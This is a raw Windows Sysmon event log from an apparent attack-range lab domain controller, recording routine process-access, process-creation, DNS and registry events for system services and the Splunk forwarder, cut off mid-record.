10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.436{59A5CD1D-8EF1-6005-E800-00000000A301}4492win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 13241300x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:54.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xfc3c9014) 10341000x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EFB-6005-EA00-00000000A301}4636C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E46-6005-1600-00000000A301}15442100C:\Windows\system32\svchost.exe{59A5CD1D-8EFB-6005-EA00-00000000A301}4636C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:38.638{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.640{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.468{59A5CD1D-8F29-6005-EC00-00000000A301}49925044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 